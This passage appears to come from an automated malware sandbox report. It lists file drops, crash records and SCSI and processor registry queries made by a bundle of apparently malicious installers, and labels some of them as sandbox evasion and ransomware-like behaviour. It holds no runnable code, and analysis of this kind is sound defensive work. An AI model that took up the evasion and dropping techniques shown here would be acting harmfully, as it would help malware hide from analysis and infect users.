18HdUo1z2PzM80zNKzXol9Tx.exe File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-PUQJV.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-EKFBH.tmp Setup.tmp File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-JESA5.tmp Setup.tmp File opened for modification C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-B1KAU.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-8HFKD.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-AV35A.tmp Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-NH7PE.tmp Esplorarne.exe.com File created C:\Program Files (x86)\Windows Photo Viewer\Tinaqamyru.exe WerFault.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-E84G7.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-0VVDK.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-O9S8J.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe Setup.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\javaw.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW md8_8eus.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Setup.exe File created C:\Program Files (x86)\UltraMediaBurner\is-ULDEK.tmp ultramediaburner.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-1G7P2.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-J268S.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-SPAE8.tmp Setup.tmp File created C:\Program Files (x86)\Windows Photo Viewer\Tinaqamyru.exe.config WerFault.exe File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\is-OUSOF.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-0C6TT.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-JR2CV.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg Setup.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-AOCA0.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe 18HdUo1z2PzM80zNKzXol9Tx.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-FMQPC.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 18HdUo1z2PzM80zNKzXol9Tx.exe File created C:\Program Files (x86)\MaskVPN\driver\win732\is-T8CDN.tmp Setup.tmp -
Drops file in Windows directory 28 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSIC7CC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF51A.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe File opened for modification C:\Windows\Installer\f772e99.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\f772e99.msi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\Installer\MSI11BC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1B62.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4760.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI394B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDD2B.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File created C:\Windows\SystemTemp\~DFDDD1593BD8795833.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSID134.tmp msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSIE589.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBDF.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF0F4F650DF0840950.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI7665.tmp msiexec.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 29 IoCs
pid pid_target Process procid_target 3208 2692 WerFault.exe 101 428 2360 WerFault.exe 99 2812 3828 WerFault.exe 123 5832 3716 WerFault.exe 150 4840 5908 WerFault.exe 168 5504 2692 WerFault.exe 144 448 1288 WerFault.exe 142 6936 2360 WerFault.exe 149 3452 2364 WerFault.exe 129 5592 428 WerFault.exe 140 6276 6404 WerFault.exe 217 6008 6680 WerFault.exe 201 5236 6616 WerFault.exe 204 6564 4100 WerFault.exe 114 7356 2288 WerFault.exe 120 7368 2288 WerFault.exe 120 7268 5324 WerFault.exe 267 6832 3024 WerFault.exe 276 6128 1188 WerFault.exe 177 7408 1180 WerFault.exe 193 3260 1752 WerFault.exe 320 4884 5896 WerFault.exe 247 8172 1368 WerFault.exe 335 7648 3152 WerFault.exe 266 1752 1968 WerFault.exe 352 6496 5872 WerFault.exe 413 5216 2560 WerFault.exe 431 5420 2844 WerFault.exe 444 7400 5536 WerFault.exe 165 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0obLAuwqU13NotahfdOa_8R4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Filters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 tapinstall.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 RjFgmagbQ7RmhF0K1UglrkFw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz RjFgmagbQ7RmhF0K1UglrkFw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 msedge.exe -
Enumerates system info in registry 2 TTPs 57 IoCs
